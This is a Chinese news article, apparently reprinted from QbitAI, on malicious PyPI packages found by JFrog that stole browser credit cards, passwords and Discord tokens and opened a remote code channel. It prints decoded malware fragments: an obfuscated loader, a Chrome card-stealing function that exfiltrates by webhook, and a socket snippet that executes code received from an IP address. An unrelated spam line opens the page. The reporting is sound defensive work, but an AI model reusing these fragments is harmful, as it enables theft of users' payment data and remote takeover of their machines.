自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

PyPI又雙叒叕發(fā)現(xiàn)惡意軟件,能盜取信用卡還有后門程序

新聞 應(yīng)用安全
Python程序員真的要小心了,PyPI軟件庫問題真是越來越嚴(yán)重。繼今年6月出現(xiàn)挖礦病毒后,PyPI最近再次出現(xiàn)了一批惡意軟件。

[[415370]]

本文經(jīng)AI新媒體量子位(公眾號(hào)ID:QbitAI)授權(quán)轉(zhuǎn)載,轉(zhuǎn)載請(qǐng)聯(lián)系出處。

Python程序員真的要小心了,PyPI軟件庫問題真是越來越嚴(yán)重。

繼今年6月出現(xiàn)挖礦病毒后,PyPI最近再次出現(xiàn)了一批惡意軟件,

JFrog安全團(tuán)隊(duì)發(fā)現(xiàn),PyPI庫中有多個(gè)軟件存在盜取信用卡信息、遠(yuǎn)程注入代碼的行為,而這些軟件總共被下載了3萬次。

這些被發(fā)現(xiàn)問題的惡意軟件分別是:

PyPI又雙叒叕發(fā)現(xiàn)惡意軟件,能盜取信用卡還有后門程序

當(dāng)程序員安裝完這些軟件后,它們將在后臺(tái)不知不覺讀取瀏覽器文件夾,從而盜取信用卡信息和密碼。

它們是如何竊取信用卡信息的

安全研究人員發(fā)現(xiàn),上述所有軟件包都使用Base64編碼進(jìn)行偽裝。

比如上述的noblesse2:

  1. import base64, codecs 
  2. magic = 'aW1wb3J0IGNvbG9yYW1hLCBkYXRldGltZS...' 
  3. love = '0iLKOcY3L4Y2q1nJkxpl97nJE9Y2EyoTI0M...' 
  4. god = 'a2luZy5hcHBlbmQodG9rZW4pDQogICAgICAg...' 
  5. destiny = 'yxIKAVDaAQK3xjpQWkqRAboUcBIzqjEmS...' 
  6. joy = '\x72\x6f\x74\x31\x33' 
  7. trust = eval('\x6d\x61\x67\x69\x63') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64...'
  8. eval(compile(base64.b64decode(eval('\x74\x72\x75\x73\x74')),'','exec')) 

這種方法可以欺騙一些簡(jiǎn)單的分析工具,但是仔細(xì)研究可以發(fā)現(xiàn)其中的問題。

以上8個(gè)軟件包分別包含了以下不同種類的惡意行為:

1、竊取Discord帳戶身份驗(yàn)證token

Discord身份驗(yàn)證token讀取器的代碼非常簡(jiǎn)單,它就是一組硬編碼的路徑:

  1. local = os.getenv('LOCALAPPDATA'
  2. roaming = os.getenv('APPDATA'
  3. paths = { 
  4.     'Discord': roaming + '\\Discord'
  5.     'Discord Canary': roaming + '\\discordcanary'
  6.     'Discord PTB': roaming + '\\discordptb'
  7.     'Google Chrome': local + '\\Google\\Chrome\\User Data\\Default'
  8.     'Opera': roaming + '\\Opera Software\\Opera Stable'
  9.     'Brave': local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default'
  10.     'Yandex': local + '\\Yandex\\YandexBrowser\\User Data\\Default' 

然后代碼會(huì)讀取這幾種瀏覽器路徑下的所有.log和.ldb文件,并查找Discord身份驗(yàn)證token,結(jié)果通過Webhook上傳到Discord。

2、竊取瀏覽器存儲(chǔ)的密碼或信用卡數(shù)據(jù)

當(dāng)你在瀏覽器中輸入密碼或信用卡數(shù)據(jù)時(shí),一般都會(huì)跳出如下窗口,提示用戶保存這些信息。

PyPI又雙叒叕發(fā)現(xiàn)惡意軟件,能盜取信用卡還有后門程序

雖然這給用戶帶來方便,今后不用一遍遍輸入密碼,但缺點(diǎn)是這些信息可能會(huì)惡意軟件獲取。

在這種情況下,惡意軟件會(huì)嘗試從Chrome竊取信用卡信息:

  1. def cs(): 
  2.     master_key = master() 
  3.     login_db = os.environ['USERPROFILE'] + os.sep + \ 
  4.         r'AppData\Local\Google\Chrome\User Data\default\Web Data' 
  5.     shutil.copy2(login_db, 
  6.                  "CCvault.db"
  7.     conn = sqlite3.connect("CCvault.db"
  8.     cursor = conn.cursor() 
  9.     try
  10.         cursor.execute("SELECT * FROM credit_cards"
  11.         for r in cursor.fetchall(): 
  12.             username = r[1
  13.             encrypted_password = r[4
  14.             decrypted_password = dpw( 
  15.                 encrypted_password, master_key) 
  16.             expire_mon = r[2
  17.             expire_year = r[3
  18.             hook.send(f"CARD-NAME: " + username + "\nNUMBER: " + decrypted_password + "\nEXPIRY M: " + str(expire_mon) + "\nEXPIRY Y: " + str(expire_year) + "\n" + "*" * 10 + "\n"

這些信息和前一種情況一樣會(huì)通過Webhook上傳。

3、收集有關(guān)受感染PC的信息:如IP地址、計(jì)算機(jī)名稱和用戶名

除此之外,這些軟件還會(huì)收集Windows許可證密鑰信息、Windows版本以及屏幕截圖。

4、遠(yuǎn)程代碼注入

pytagora和pytagora2這兩個(gè)惡意軟件會(huì)嘗試連接到某個(gè)IP地址9009端口上,然后執(zhí)行Socket中可用的任何Python代碼。

其中混淆的代碼被安全人員解碼成如下片段:

  1. import socket,struct,time 
  2. s=socket.socket(2,socket.socket.socket.SOCK_STREAM) 
  3. s.connect(('172.16.60.80',9009)) 
  4. l=struct.unpack('>I',s.recv(4))[0
  5. print (l) 
  6. d=s.recv(l) 
  7. print (d) 
  8. while len(d)>!1
  9. d+=s.recv(l-len(d)) 
  10. print (d) 
  11. exec(d,{'s':s}) 

但是安全人員現(xiàn)在不知道這個(gè)IP地址是什么,或者上面是否存在惡意軟件。

中毒后如何挽救

如果你發(fā)現(xiàn)自己的電腦已經(jīng)安裝了諸如noblesse的惡意軟件,那么請(qǐng)檢查一下你的瀏覽器到底保存了哪些密碼,這些密碼可能已經(jīng)泄露,請(qǐng)盡快修改。

對(duì)于Edge瀏覽器用戶,請(qǐng)?jiān)诘刂窓谥休斎雃dge://settings/passwords,查看已保存的密碼。

對(duì)于Chrome瀏覽器用戶,請(qǐng)?jiān)诘刂窓谥休斎隿hrome://settings/payments,在付款方式一欄下查看已保存的信用卡信息。

另外可以松口氣的是,PyPI維護(hù)人員已經(jīng)刪除了這些惡意軟件包。

雖然PyPI軟件庫現(xiàn)在是安全了,但是鑒于這些開源軟件庫現(xiàn)在的維護(hù)狀態(tài),未來很可能還會(huì)遇到更多攻擊。今年P(guān)yPI庫出現(xiàn)安全問題的狀況就不止一次出現(xiàn)。

[[415371]]

“攻擊者能夠使用簡(jiǎn)單的混淆技術(shù)來引入惡意軟件,這意味著開發(fā)人員必須保持警惕。”

JFrog CTO說,“這是一個(gè)系統(tǒng)性威脅,需要由軟件存儲(chǔ)庫的維護(hù)者和開發(fā)人員在多個(gè)層面積極解決。”

 

 

責(zé)任編輯:張燕妮 來源: 量子位
相關(guān)推薦

2021-08-05 06:22:02

惡意軟件Python軟件信用卡

2017-03-13 16:58:05

戴爾

2018-11-08 17:57:22

華為

2021-10-30 19:01:17

磁盤字節(jié)文件

2025-02-20 12:00:13

React前端React 19

2021-08-04 09:24:58

PyPI惡意軟件漏洞

2024-12-06 14:58:22

2024-04-03 15:41:53

服務(wù)器

2020-05-18 13:23:59

寧暢

2025-04-08 09:29:55

2023-01-10 11:37:22

Python 庫PySnooper項(xiàng)目

2018-01-17 16:36:40

Windows 10Windows免費(fèi)升級(jí)

2018-04-13 11:14:42

2017-11-21 10:13:11

微軟打印機(jī)補(bǔ)丁

2022-08-10 18:20:25

信用卡竊取新加坡網(wǎng)絡(luò)釣魚

2021-02-22 10:04:10

黑客Google AppsCSP

2020-09-01 11:00:14

UltraRank惡意代碼網(wǎng)絡(luò)攻擊

2023-12-15 09:19:44

百度飛槳文心大模型大模型

2020-03-27 22:29:16

信息安全網(wǎng)絡(luò)攻擊東京奧運(yùn)會(huì)

2017-08-23 12:55:51

ROOBO
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)